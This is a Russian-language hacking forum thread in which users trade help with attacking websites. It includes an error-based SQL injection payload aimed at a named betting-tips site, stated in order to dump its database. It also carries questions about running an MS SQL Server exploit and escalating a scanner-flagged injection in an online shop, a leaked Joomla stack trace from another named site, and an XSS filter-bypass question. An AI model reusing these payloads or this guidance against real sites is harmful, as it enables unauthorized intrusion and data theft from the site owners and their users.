Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    нету
     
  2. UNIXTREID

    UNIXTREID Member

    Joined:
    2 Nov 2015
    Messages:
    140
    Likes Received:
    22
    Reputations:
    1
    Подскажите по вот этому эксплойту: https://www.exploit-db.com/exploits/38005/ (MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit) Просто раньше не работал с такими, asp'овскими. Как их эксплуатировать? Я видел, допустим, в примерах с php заливают эксплойт на сервер и просто переходят на него по ссылке для эксплуатации. Здесь вроде такой же подход? И какой именно шеллкод у этого сплоита? Просто, допустим, нужно открыть порт, а он вроде бы по другим командам...

    И ещё, подскажите, кто знает, для каких версий SQL 2005 подходит данный сплоит. Там расписано больше, что под SQL Server 2000 SP4, а по 2005 мало что сказано (((
     
    #942 UNIXTREID, 25 Dec 2015
    Last edited: 25 Dec 2015
  3. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    не тянет не хавидж не sqlmap вот такую вот скулю
    Code:
    http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
    как раскрутить sqlmapom или еще чем нить это божетво.
     
  4. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    Проверял один магазин и Acutenix сказал что есть тут sql inject

    И какого типа эта уязвимость?
    Вопрос а как дальше крутить? что подставлять?
     
  5. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ставь Live http headers на мозилу и крути
     
  6. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж
     
  7. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
    Получаю вот такой ответ.
     
  8. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
     
  9. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    поробуй через error baze вывести имена таблиц вот таким запросом
    Code:
    'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
     
  10. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
     
  11. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    что некто не может раскрутить*?)
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    написать скрипт же
     
    _________________________
  13. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Да вот найти бы умельца(сам в этом еще не соображаю
     
  14. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    jos-Warning: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = 'http://www.raa.ru/index.php?id=2011\'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}

    Что можно хорошего получить от этой ошибки?
     
  15. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    раскрытие путей, не больше, скули тут нет
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    с чего вы взяли?
    каким запросом она вызвана? когда в параметр id добавили обратный слэш?
     
    _________________________
  17. vivona

    vivona New Member

    Joined:
    26 Dec 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    так там что со слещем что без слеша нет разници, это просто ошибка DB поробуй крутануть любым способом,нечего не выйдет
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Как я понял http://www.raa.ru/index.php?id=
     
  19. BlitzXX

    BlitzXX New Member

    Joined:
    5 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Можно реализовать XSS? Фильтруется только "<". ?
    Code:
    <a href="http://yandex.ru">Text</a>
    p\s gde text
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    не заметил ошибку, колонки header просто нет.
     
    _________________________